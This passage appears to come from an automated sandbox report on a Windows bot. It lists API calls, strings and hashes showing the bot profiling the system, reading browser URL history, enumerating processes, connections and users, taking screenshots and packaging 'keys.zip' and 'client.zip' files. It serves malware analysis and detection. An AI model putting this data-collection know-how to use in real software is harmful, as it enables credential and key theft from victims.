                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB5337
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB534A
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB535E
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB536B
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB537B
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB538C
                                                                                                                                                                                                            • GetTimeFormatA.KERNEL32(00000409,00000000,00000000,HH:mm:ss,?,00000104), ref: 02BB53AC
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB53C0
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 02BB53CD
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Local time: ,0000000D,00000000,00000000), ref: 02BB53DD
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 02BB53EE
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB541C
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB542B
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB543F
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5452
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5466
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5473
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB5483
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5494
                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?), ref: 02BB54A1
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB5502
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5519
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 02BB5526
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{GMT: ,00000006,00000000,00000000), ref: 02BB5536
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 02BB5547
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5572
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5581
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB5595
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB55A8
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB55BC
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB55C9
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB55D9
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB55EA
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB55FE
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02BB560B
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Uptime: ,00000009,00000000,00000000), ref: 02BB561B
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02BB562C
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB566C
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB567B
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB568C
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 02BB569F
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB56B3
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB56C0
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB56D0
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB56E1
                                                                                                                                                                                                            • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02BB56F3
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5707
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 02BB5714
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Windows directory: ,00000014,00000000,00000000), ref: 02BB5724
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 02BB5735
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5760
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB576F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB5783
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5796
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB57AA
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB57B7
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB57C7
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB57D8
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB57EC
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 02BB57F9
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Administrator: ,00000010,00000000,00000000), ref: 02BB5809
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 02BB581A
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BB5820
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BB5843
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5875
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB5884
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB5895
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB58A8
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB58BC
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB58C8
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB58D8
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB58E6
                                                                                                                                                                                                              • Part of subcall function 02BB4900: RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 02BB4925
                                                                                                                                                                                                              • Part of subcall function 02BB4900: _snprintf.MSVCRT ref: 02BB494D
                                                                                                                                                                                                              • Part of subcall function 02BB4900: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,76F93490), ref: 02BB4987
                                                                                                                                                                                                              • Part of subcall function 02BB4900: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB49A9
                                                                                                                                                                                                              • Part of subcall function 02BB4900: LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB49B5
                                                                                                                                                                                                              • Part of subcall function 02BB4900: WriteFile.KERNEL32(00000000,IE history:,0000000C,02BB58F1,00000000), ref: 02BB49C9
                                                                                                                                                                                                              • Part of subcall function 02BB4900: UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB49D7
                                                                                                                                                                                                              • Part of subcall function 02BB4900: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB49EB
                                                                                                                                                                                                              • Part of subcall function 02BB4900: LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BB49F7
                                                                                                                                                                                                              • Part of subcall function 02BB4900: WriteFile.KERNEL32(00000000,02BF5C1C,00000001,00000000,00000000), ref: 02BB4A0B
                                                                                                                                                                                                              • Part of subcall function 02BB4900: UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BB4A19
                                                                                                                                                                                                              • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000008,00000C10,00000000,00000000,76F93490), ref: 02BB419D
                                                                                                                                                                                                              • Part of subcall function 02BB4180: HeapAlloc.KERNEL32(00000000), ref: 02BB41A0
                                                                                                                                                                                                              • Part of subcall function 02BB4180: memset.MSVCRT ref: 02BB41B4
                                                                                                                                                                                                              • Part of subcall function 02BB4180: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BB4224
                                                                                                                                                                                                              • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4232
                                                                                                                                                                                                              • Part of subcall function 02BB4180: HeapValidate.KERNEL32(00000000), ref: 02BB4235
                                                                                                                                                                                                              • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4242
                                                                                                                                                                                                              • Part of subcall function 02BB4180: HeapFree.KERNEL32(00000000), ref: 02BB4245
                                                                                                                                                                                                              • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000008,00000BED), ref: 02BB425D
                                                                                                                                                                                                              • Part of subcall function 02BB4180: HeapAlloc.KERNEL32(00000000), ref: 02BB4260
                                                                                                                                                                                                              • Part of subcall function 02BB4180: memset.MSVCRT ref: 02BB4270
                                                                                                                                                                                                              • Part of subcall function 02BB4180: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BB428A
                                                                                                                                                                                                              • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4297
                                                                                                                                                                                                              • Part of subcall function 02BB4180: HeapValidate.KERNEL32(00000000), ref: 02BB429A
                                                                                                                                                                                                              • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB42AB
                                                                                                                                                                                                              • Part of subcall function 02BB4180: HeapFree.KERNEL32(00000000), ref: 02BB42AE
                                                                                                                                                                                                              • Part of subcall function 02BB44D0: memset.MSVCRT ref: 02BB4503
                                                                                                                                                                                                              • Part of subcall function 02BB44D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02BB450E
                                                                                                                                                                                                              • Part of subcall function 02BB44D0: Process32First.KERNEL32 ref: 02BB4531
                                                                                                                                                                                                              • Part of subcall function 02BB44D0: GetHandleInformation.KERNEL32(00000000,?), ref: 02BB454D
                                                                                                                                                                                                              • Part of subcall function 02BB44D0: CloseHandle.KERNEL32(00000000), ref: 02BB4567
                                                                                                                                                                                                              • Part of subcall function 02BB4710: NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,00000000,00000000,00000000,00000000,76F93490,?,?,?,?,02BB5903,00000000), ref: 02BB475A
                                                                                                                                                                                                              • Part of subcall function 02BB4710: GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,?,02BB5903,00000000,00000000,00000000), ref: 02BB47A5
                                                                                                                                                                                                              • Part of subcall function 02BB4710: HeapAlloc.KERNEL32(00000000,?,?,?,?,02BB5903,00000000,00000000,00000000), ref: 02BB47AC
                                                                                                                                                                                                              • Part of subcall function 02BB4710: memset.MSVCRT ref: 02BB47BF
                                                                                                                                                                                                              • Part of subcall function 02BB4710: _snprintf.MSVCRT ref: 02BB480A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB5913
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BB5924
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$LockPointerUnlockWrite$Heap$Process$memset$HandleInformationSecuritySystem_snprintf$AllocDescriptorFreeUser$AdminCloseCreateFormatMetricsNameQueryTableTimeValidate$CapsConvertDateDefaultDeviceDirectoryDisplayEnvironmentFirstInfoLangLocalModuleNamedOpenProcess32SaclSnapshotStringToolhelp32ValueVariableWindowsZone
                                                                                                                                                                                                            • String ID: %c%d:%02d$%dx%d@%d$4.1.2$HH:mm:ss$PROCESSOR_IDENTIFIER$XXX$dd:MMM:yyyy$false$true${Administrator: ${BotVer: ${Date: ${GMT: ${Language: ${Local time: ${Process: ${Processor: ${Screen: ${Uptime: ${Username: ${Windows directory:
                                                                                                                                                                                                            • API String ID: 2738427392-2715564829
                                                                                                                                                                                                            • Opcode ID: 0cb395f4b5bce665510789361ee3b347671e167ebd4bf2d1c0b05dd604e7978e
                                                                                                                                                                                                            • Instruction ID: 5ccde02bcb3cefbc70dc628a6fa62c2e70b19bc150c9d82681cc1931ee991ba1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cb395f4b5bce665510789361ee3b347671e167ebd4bf2d1c0b05dd604e7978e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EFA2FA70A81318BEFB619B948C4AFEE7B78EF45B04F604584F341BA1C0D7F46A458B69
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 02BBD35F
                                                                                                                                                                                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 02BBD36A
                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02BBD37D
                                                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 02BBD392
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000EB), ref: 02BBD3A1
                                                                                                                                                                                                            • SetWindowTextA.USER32(?,-00000008), ref: 02BBD3AD
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBD3BC
                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02BBD3C7
                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02BBD3DA
                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 02BBD418
                                                                                                                                                                                                            • GetClassLongA.USER32(00000000,000000E6), ref: 02BBD428
                                                                                                                                                                                                            • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02BBD437
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 02BBD44F
                                                                                                                                                                                                            • GetObjectA.GDI32(00000000,0000003C,?), ref: 02BBD459
                                                                                                                                                                                                            • CreateFontIndirectA.GDI32 ref: 02BBD46F
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000030,00000000,00000000), ref: 02BBD47F
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000005), ref: 02BBD4B7
                                                                                                                                                                                                            • GetWindow.USER32(00000000), ref: 02BBD4BA
                                                                                                                                                                                                            • GetWindowInfo.USER32(00000000,?), ref: 02BBD4CE
                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 02BBD533
                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000116,?,00000200), ref: 02BBD55D
                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 02BBD569
                                                                                                                                                                                                            • MoveWindow.USER32(?,00000009,00000014,000000FC,00000014,00000001), ref: 02BBD585
                                                                                                                                                                                                            • CreateWindowExA.USER32(00000000,static,00000000,50000003,?,0000000A,00000023,00000027,?,00000000,00000000,00000000), ref: 02BBD5AA
                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000F4,?), ref: 02BBD5BC
                                                                                                                                                                                                            • GetClassLongA.USER32(00000000,000000E6), ref: 02BBD5C5
                                                                                                                                                                                                            • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02BBD5D4
                                                                                                                                                                                                            • GetWindowTextLengthA.USER32(00000000), ref: 02BBD5DB
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,00000008,0000000C), ref: 02BBD5EF
                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 02BBD613
                                                                                                                                                                                                            • SendMessageA.USER32(00000000,0000007F,00000001,00000000), ref: 02BBD620
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 02BBD630
                                                                                                                                                                                                            • GetClassLongA.USER32(00000000,000000DE), ref: 02BBD64C
                                                                                                                                                                                                            • GetClassLongA.USER32(00000000,000000F2), ref: 02BBD655
                                                                                                                                                                                                            • LoadIconA.USER32(00000000,00007F00), ref: 02BBD661
                                                                                                                                                                                                            • SendMessageA.USER32(00000000,00000172,00000001,00000000), ref: 02BBD67B
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBD6A4
                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02BBD6B3
                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02BBD6C6
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000003), ref: 02BBD6E9
                                                                                                                                                                                                            • IsIconic.USER32(?), ref: 02BBD707
                                                                                                                                                                                                            • ShowWindow.USER32(?,00000001), ref: 02BBD714
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBD723
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BBD73B
                                                                                                                                                                                                              • Part of subcall function 02BBD2B0: GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBD2BC
                                                                                                                                                                                                              • Part of subcall function 02BBD2B0: GetCurrentThreadId.KERNEL32 ref: 02BBD2C4
                                                                                                                                                                                                              • Part of subcall function 02BBD2B0: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02BBD2D0
                                                                                                                                                                                                              • Part of subcall function 02BBD2B0: SendMessageA.USER32(?,0000000D,?,?), ref: 02BBD2E1
                                                                                                                                                                                                              • Part of subcall function 02BBD2B0: AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02BBD2ED
                                                                                                                                                                                                            • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 02BBD748
                                                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 02BBD7B7
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000), ref: 02BBD7BE
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBD7CE
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BBD7E8
                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000000), ref: 02BBD7FD
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000EB), ref: 02BBD80C
                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 02BBD818
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BBD827
                                                                                                                                                                                                            • DestroyWindow.USER32(00000000), ref: 02BBD82E
                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 02BBD843
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$Long$ClassMessage$SendThread$ItemObject$AttachCreateHeapInputMutexProcessRectReleaseSingleTextWait$AllocClientCurrentDeleteDestroyDialogFontFreeIconIconicIndirectInfoLengthLoadMovePostShow
                                                                                                                                                                                                            • String ID: '$<$static
                                                                                                                                                                                                            • API String ID: 2592195760-1233416523
                                                                                                                                                                                                            • Opcode ID: 6a6e5a56f8d4b7326b130102c1beb45bd905bc4a5640e49351fc8f5186006787
                                                                                                                                                                                                            • Instruction ID: bbe77d3bf8c27a51baf993195a4ebad47598fbc2af0b58c3bc250a8c02e394a5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a6e5a56f8d4b7326b130102c1beb45bd905bc4a5640e49351fc8f5186006787
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53E1C471984301AFD7A18F68EC88F7A37A8EF887A2F540A08F755E72C5C7B49451CB61
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB3ACA
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004,?), ref: 02BB3B33
                                                                                                                                                                                                            • SymSetOptions.DBGHELP(00000006), ref: 02BB3B48
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000001), ref: 02BB3B58
                                                                                                                                                                                                            • SymInitialize.DBGHELP(00000000), ref: 02BB3B5B
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 02BB3B9A
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,main,00000000,?), ref: 02BB3C27
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB3C47
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02BB3CD4
                                                                                                                                                                                                            • ZwQueryInformationThread.NTDLL(00000000), ref: 02BB3CDB
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 02BB3D20
                                                                                                                                                                                                              • Part of subcall function 02BD5460: VirtualQuery.KERNEL32(02BD5460,?,0000001C), ref: 02BD5488
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • sysinfo.log, xrefs: 02BB3F78
                                                                                                                                                                                                            • DEBUG, xrefs: 02BB404D
                                                                                                                                                                                                            • HH;mm;ss, xrefs: 02BB3EB2
                                                                                                                                                                                                            • ThreadStart = , xrefs: 02BB3CF8
                                                                                                                                                                                                            • CallStack:, xrefs: 02BB3D58
                                                                                                                                                                                                            • debug_%s_%s.log, xrefs: 02BB3ED4
                                                                                                                                                                                                            • scr.bmp, xrefs: 02BB3FF8
                                                                                                                                                                                                            • main, xrefs: 02BB3BEE
                                                                                                                                                                                                            • dd;MMM;yyyy, xrefs: 02BB3E8B
                                                                                                                                                                                                            • ExceptionAddress = , xrefs: 02BB3B68
                                                                                                                                                                                                            • csm, xrefs: 02BB3A45
                                                                                                                                                                                                            • Self exception = TRUE, xrefs: 02BB3C8D
                                                                                                                                                                                                            • ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X, xrefs: 02BB3C3E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Current$ProcessQueryVirtual$Thread$AllocErrorInformationInitializeLastOptions_snprintf
                                                                                                                                                                                                            • String ID: CallStack:$ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X$Self exception = TRUE$ThreadStart = $DEBUG$ExceptionAddress = $HH;mm;ss$csm$dd;MMM;yyyy$debug_%s_%s.log$main$scr.bmp$sysinfo.log
                                                                                                                                                                                                            • API String ID: 2913300210-1369666974
                                                                                                                                                                                                            • Opcode ID: 8bb82fe8fc594765472ac2c65ca803e0bac1a53933efa8a23bbab986de210314
                                                                                                                                                                                                            • Instruction ID: 0839a6c44019a311880b14a3d3d9dfb0d7b2d70f0c7ef853d7c2cae4017eefb5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8bb82fe8fc594765472ac2c65ca803e0bac1a53933efa8a23bbab986de210314
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D712E371A006059FDB25CF68C894BEABBF2FF49304F5485D8E949DB351DBB1A948CB80
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD2BCE
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD2BE8
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02BD2C12
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CE90), ref: 02BD2C37
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02BD2C77
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD2C81
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD2C89
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02BD2C9A
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD2CA1
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 02BD2CE4
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(00000000), ref: 02BD2D30
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CE90,00000000,00000000), ref: 02BD2D77
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashDirectoryErrorFileLastmemset$AdminAttributesCreateCurrentFolderMakeModuleNameSystemUser
                                                                                                                                                                                                            • String ID: Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$\$\SIGN1\$client.zip$keys.zip$path_client.txt$path_keys.txt
                                                                                                                                                                                                            • API String ID: 1576442920-3133255229
                                                                                                                                                                                                            • Opcode ID: 3c7bf2ff980502d3c51b6da101097ae04c48434f1774128b32ba6c8cc6f1ec00
                                                                                                                                                                                                            • Instruction ID: dd60c5284d994a9b00b817e2fc5497e8ff43cbc09e91c6cebe123f8da4634dab
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c7bf2ff980502d3c51b6da101097ae04c48434f1774128b32ba6c8cc6f1ec00
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0D146309043899FDB258F38D858BEA7BE5EF45340F1485D5EDCAD7242EB70A989CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCD13F
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCD161
                                                                                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02BCD176
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 02BCD18F
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 02BCD1D8
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02BCD1EB
